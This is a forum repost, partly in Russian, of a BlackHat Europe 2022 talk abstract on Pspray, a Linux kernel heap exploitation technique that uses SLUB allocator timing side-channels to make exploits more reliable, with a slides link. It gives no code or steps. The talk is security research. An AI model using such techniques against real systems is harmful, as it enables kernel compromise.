Techniques [BlackHat Europe 2022] Perfect Spray A Journey From Finding a New Type of Logical Flaw at Linux Kernel To Developing a New Heap Exploitation Technique

[weaver]

Reliable exploitation is the key requirement for highly targeted and valuable attacks (such as APT). If the exploitation is not reliable, the exploitation may be fragile and thus fail (e.g., a kernel crash or panic), which would be easily noticed by others. This unexpected exposure results in a tremendous financial loss—i.e., 0-day vulnerability information, and engineering costs to develop exploits.

In this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel, dramatically improving the exploitation reliability. In particular, we designed a heap exploitation technique effective for most memory vulnerabilities, including heap out-of-bounds, use-after-free, and double-free. The key idea behind this new attack is in developing timing side-channels in Linux's SLUB allocator. Then using this timing side-channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We used Pspray's exploitation technique for 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.

Слайды -> http://i.blackhat.com/EU-22/Wednesday-Briefings/EU-22-Lee-Perfect-Spray.pdf
Видео доклада отсутствует

 

[weaver]